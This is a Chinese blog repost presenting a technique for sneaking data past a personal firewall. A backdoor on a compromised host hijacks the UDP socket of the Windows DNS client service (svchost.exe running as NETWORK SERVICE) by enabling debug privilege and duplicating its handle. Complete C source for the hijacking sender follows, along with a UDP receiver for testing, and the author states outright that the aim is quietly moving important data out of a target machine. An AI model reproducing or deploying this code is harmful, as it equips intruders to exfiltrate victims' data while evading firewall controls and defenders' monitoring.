首页  编辑  

利用DNS穿透防火墙进行数据传输

Tags: /超级猛料/Network.网络通讯/UDP/   Date Created:

一种新的穿透防火墙的数据传输技术      选择自 iiprogram 的 Blog  

关键字   一种新的穿透防火墙的数据传输技术  

出处    

使用该技术背景:

在目标主机安放后门,需要将数据传输出去,同时数据很重要,动作不能太大.其他情况"严重"不推荐使用该技术(后面我会讲到为什么).

   针对目前防火墙的一些情况,如果自己的进程开一个端口(甚至是新建套接字)肯定被拦.

相反,有一点我们也很清楚:被防火墙验证的进程在传送数据时永远不会被拦.所以,我的思路很简单:

将其他进程中允许数据传输的套接字句柄拿为已用.过程如下:

1. 找出目标进程

2. 找出SOCKET句柄

2. 用DuplicateHandle()函数将其SOCKET转换为能被自己使用.

3. 用转换后的SOCKET进行数据传输

   上面的过程写的很简单,但是实际实现起来还是存在一些问题(后面再做讨论).而且从上面的实现方法也

可以看出一些不爽的地方:在目标进程的SOCKET不能是TCP,因为TCP的句柄已经跟外面建立了连接,所以只能是UDP.

针对不同系统不同进程我们很难定位一个稳定的进程SOCKET.

   看到上面这些,你有点丧气了对不对,哈哈. 再想一想,其实我们有一条真正的通罗马的"黄金大道".

   我们知道只要一台计算机连上了网络,那么有一种数据传输是肯定不会被拦截的,那就是DNS.你能想像域名解析数据都被

拦了造成的结果吗? 嘿嘿, 既然这个是永远不会被拦的, 而且它又是UDP传输, 我们就拿他开刀...

下面是通过直接控制DNS进程(其实也就是svchost.exe,不过对应用户名是NETWORK SERVICE)进行数据传输的例子.

编程中出现了很多问题,比方说获取svchost对应用户名时没有权限(但是能够操作LOCAL SERVICE),在句柄值为0x2c时进行getsockname时会停止运行等等.

具体解决方法请细看注释部分...

/*++

 Made By ZwelL

 zwell@sohu.com

 2005.4.12

--*/

#include <winsock2.h>

#include <stdio.h>

#include <wtsapi32.h>

#pragma comment(lib, "ws2_32")

#pragma comment(lib, "wtsapi32")

#define NT_SUCCESS(status)          ((NTSTATUS)(status)>=0)

#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

typedef LONG    NTSTATUS;

typedef struct _SYSTEM_HANDLE_INFORMATION

{

   ULONG            ProcessId;

   UCHAR            ObjectTypeNumber;

   UCHAR            Flags;

   USHORT            Handle;

   PVOID            Object;

   ACCESS_MASK        GrantedAccess;

} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef ULONG (WINAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);

ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;

BOOL LocateNtdllEntry ( void )

{

   BOOL    ret         = FALSE;

   char    NTDLL_DLL[] = "ntdll.dll";

   HMODULE ntdll_dll   = NULL;

   if ( ( ntdll_dll = GetModuleHandle( NTDLL_DLL ) ) == NULL )

   {

       printf( "GetModuleHandle() failed");

       return( FALSE );

   }

   if ( !( ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( ntdll_dll, "ZwQuerySystemInformation" ) ) )

   {

       goto LocateNtdllEntry_exit;

   }

   ret = TRUE;

LocateNtdllEntry_exit:

   if ( FALSE == ret )

   {

       printf( "GetProcAddress() failed");

   }

   ntdll_dll = NULL;

   return( ret );

}

/*++

This routine is used to get a process's username from it's SID

--*/

BOOL GetUserNameFromSid(PSID pUserSid, char *szUserName)

{

   // sanity checks and default value

   if (pUserSid == NULL)

       return false;

   strcpy(szUserName, "?");

   SID_NAME_USE   snu;

   TCHAR          szUser[_MAX_PATH];

   DWORD          chUser = _MAX_PATH;

   PDWORD         pcchUser = &chUser;

   TCHAR          szDomain[_MAX_PATH];

   DWORD          chDomain = _MAX_PATH;

   PDWORD         pcchDomain = &chDomain;

   // Retrieve user name and domain name based on user's SID.

   if (

       ::LookupAccountSid(

       NULL,

       pUserSid,

       szUser,

       pcchUser,

       szDomain,

       pcchDomain,

       &snu

       )

       )

   {

       wsprintf(szUserName, "%s", szUser);

   }

   else

   {

       return false;

   }

   return true;

}  

/*++

This routine is used to get the DNS process's Id

 

Here, I use WTSEnumerateProcesses to get process user Sid,

and then get the process user name. Beacause as it's a "NETWORK SERVICE",

we cann't use OpenProcessToken to catch the DNS process's token information,

even if we has the privilege in catching the SYSTEM's.

--*/

DWORD GetDNSProcessId()

{

   PWTS_PROCESS_INFO pProcessInfo = NULL;

   DWORD             ProcessCount = 0;

   char              szUserName[255];

   DWORD              Id = -1;

   if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, 0, 1, &pProcessInfo, &ProcessCount))

   {

       // dump each process description

       for (DWORD CurrentProcess = 0; CurrentProcess < ProcessCount; CurrentProcess++)

       {

           if( strcmp(pProcessInfo[CurrentProcess].pProcessName, "svchost.exe") == 0 )

           {

               GetUserNameFromSid(pProcessInfo[CurrentProcess].pUserSid, szUserName);

               if( strcmp(szUserName, "NETWORK SERVICE") == 0)

               {

                   Id = pProcessInfo[CurrentProcess].ProcessId;

                   break;

               }

           }

       }

       WTSFreeMemory(pProcessInfo);

   }

   return Id;

}

/*++

This doesn't work as we know, sign...

but you can use the routine for other useing...

--*/

/*

BOOL GetProcessUserFromId(char *szAccountName, DWORD PID)

{

   HANDLE hProcess = NULL,

           hAccessToken = NULL;

   TCHAR InfoBuffer[1000], szDomainName[200];

   PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;

   DWORD dwInfoBufferSize,dwAccountSize = 200, dwDomainSize = 200;

   SID_NAME_USE snu;

   hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, PID);

   if(hProcess == NULL)

   {

       printf("OpenProcess wrong");

       CloseHandle(hProcess);

       return false;

   }

   if(0 == OpenProcessToken(hProcess,TOKEN_QUERY,&hAccessToken))

   {

       printf("OpenProcessToken wrong:%08x", GetLastError());

       return false;

   }

   GetTokenInformation(hAccessToken,TokenUser,InfoBuffer,

       1000, &dwInfoBufferSize);

   LookupAccountSid(NULL, pTokenUser->User.Sid, szAccountName,

       &dwAccountSize,szDomainName, &dwDomainSize, &snu);

   if(hProcess)

       CloseHandle(hProcess);

   if(hAccessToken)

       CloseHandle(hAccessToken);

   return true;

}*/

/*++

Now, it is the most important stuff... ^_^

--*/

SOCKET GetSocketFromId (DWORD PID)

{

   NTSTATUS                     status;

   PVOID                        buf   = NULL;

   ULONG                        size  = 1;

   ULONG                        NumOfHandle = 0;

   ULONG                        i;

   PSYSTEM_HANDLE_INFORMATION    h_info  = NULL;

   HANDLE    sock = NULL;

   DWORD    n;

   buf=malloc(0x1000);

   if(buf == NULL)

   {

       printf("malloc wrong\n");

       return NULL;

   }

   status = ZwQuerySystemInformation( 0x10, buf, 0x1000, &n );

   if(STATUS_INFO_LENGTH_MISMATCH == status)

   {

       free(buf);

       buf=malloc(n);

       if(buf == NULL)

       {

           printf("malloc wrong\n");

           return NULL;

       }

       status = ZwQuerySystemInformation( 0x10, buf, n, NULL);

   }

   else

   {

       printf("ZwQuerySystemInformation wrong\n");

       return NULL;

   }

   NumOfHandle = *(ULONG*)buf;

   h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf+4);

   for(i = 0; i<NumOfHandle ;i++)

   {

       try

       {

           if( ( h_info[i].ProcessId == PID )  && ( h_info[i].ObjectTypeNumber == 0x1c )

               && (h_info[i].Handle!=0x2c)    // I don't know why if the Handle equal to 0x2c, in my test, it stops at getsockname()

                                           // So I jump over this situation...

                                           // May be it's different in your system,

               ) //wind2000 is 0x1a

           {

               //printf("Handle:0x%x Type:%08x\n",h_info[i].Handle, h_info[i].ObjectTypeNumber);

               if( 0 == DuplicateHandle(

                   OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID),

                   (HANDLE)h_info[i].Handle,

                   GetCurrentProcess(),

                   &sock,

                   STANDARD_RIGHTS_REQUIRED,

                   true,

                   DUPLICATE_SAME_ACCESS)

                   )

               {

                   printf("DuplicateHandle wrong:%8x", GetLastError());

                   continue;

               }

               //printf("DuplicateHandle ok\n");

               sockaddr_in name = {0};

               name.sin_family = AF_INET;

               int namelen = sizeof(sockaddr_in);

               getsockname( (SOCKET)sock, (sockaddr*)&name, &namelen );

               //printf("PORT=%5d\n",    ntohs( name.sin_port ));

               if(ntohs(name.sin_port)>0)    // if port > 0, then we can use it

                   break;

           }

       }

       catch(...)

       {

           continue;

       }

   }

   if ( buf != NULL )

   {

       free( buf );

   }

   return (SOCKET)sock;

}

/*++

This is not required...

--*/

BOOL EnablePrivilege (PCSTR name)

{

   HANDLE hToken;

   BOOL rv;

   TOKEN_PRIVILEGES priv = { 1, {0, 0, SE_PRIVILEGE_ENABLED} };

   LookupPrivilegeValue (

       0,

       name,

       &priv.Privileges[0].Luid

       );

   priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

   OpenProcessToken(

       GetCurrentProcess (),

       TOKEN_ADJUST_PRIVILEGES,

       &hToken

       );

   AdjustTokenPrivileges (

       hToken,

       FALSE,

       &priv,

       sizeof priv,

       0,

       0

       );

   rv = GetLastError () == ERROR_SUCCESS;

   CloseHandle (hToken);

   return rv;

}

void main()

{

   WSADATA wsaData;

   char    testbuf[255];

   SOCKET    sock;

   sockaddr_in RecvAddr;

   int iResult = WSAStartup(MAKEWORD(2,2), &wsaData);

   if (iResult != NO_ERROR)

       printf("Error at WSAStartup()\n");

   if(!LocateNtdllEntry())

       return;

   if(!EnablePrivilege (SE_DEBUG_NAME))

   {

       printf("EnablePrivilege wrong\n");

       return;

   }

   sock = GetSocketFromId(GetDNSProcessId());

   if( sock==NULL)

   {

       printf("GetSocketFromId wrong\n");

       return;

   }

   //Change there value...

   RecvAddr.sin_family = AF_INET;

   RecvAddr.sin_port = htons(5555);

   RecvAddr.sin_addr.s_addr = inet_addr("127.0.0.1");

   if(SOCKET_ERROR == sendto(sock,

           "test",

           5,

           0,

           (SOCKADDR *) &RecvAddr,

           sizeof(RecvAddr)))

   {

       printf("sendto wrong:%d\n", WSAGetLastError());

   }

   else

   {

       printf("send ok... Have fun, right? ^_^\n");

   }

   

   getchar();

   //WSACleanup();

   return;

}

很早以前我就有这个想法了,只是一直没有去实现.在上面的代码中,

因为要找出DNS进程句柄,而svchost.exe又有多个,所以以用户名来进行判断,本来是用OpenProcessToken,

但是怎么也不行,所以换个方法.用到了wtsapi32库函数.

再用下面的代码测试:

/*++

UdpReceiver

--*/

#include <stdio.h>

#include "winsock2.h"

#pragma comment(lib, "ws2_32")

void main()

{

 WSADATA wsaData;

 SOCKET RecvSocket;

 sockaddr_in RecvAddr;

 int Port = 5555;

 char RecvBuf[1024];

 int  BufLen = 1024;

 sockaddr_in SenderAddr;

 int SenderAddrSize = sizeof(SenderAddr);

 //-----------------------------------------------

 // Initialize Winsock

 WSAStartup(MAKEWORD(2,2), &wsaData);

 //-----------------------------------------------

 // Create a receiver socket to receive datagrams

 RecvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

 //-----------------------------------------------

 // Bind the socket to any address and the specified port.

 RecvAddr.sin_family = AF_INET;

 RecvAddr.sin_port = htons(Port);

 RecvAddr.sin_addr.s_addr = htonl(INADDR_ANY);

 bind(RecvSocket, (SOCKADDR *) &RecvAddr, sizeof(RecvAddr));

 //-----------------------------------------------

 // Call the recvfrom function to receive datagrams

 // on the bound socket.

 printf("Receiving datagrams...\n");

 while(1)

 {

   recvfrom(RecvSocket,

       RecvBuf,

       BufLen,

       0,

       (SOCKADDR *)&SenderAddr,

       &SenderAddrSize);

   printf("%s\n", RecvBuf);

 }

 //-----------------------------------------------

 // Close the socket when finished receiving datagrams

 printf("Finished receiving. Closing socket.\n");

 closesocket(RecvSocket);

 //-----------------------------------------------

 // Clean up and exit.

 printf("Exiting.\n");

 WSACleanup();

 return;

}

测试步骤:

1. 在一台机器上执行UdpReceiver,

2. 在安装防火墙的机器上执行第一个程序.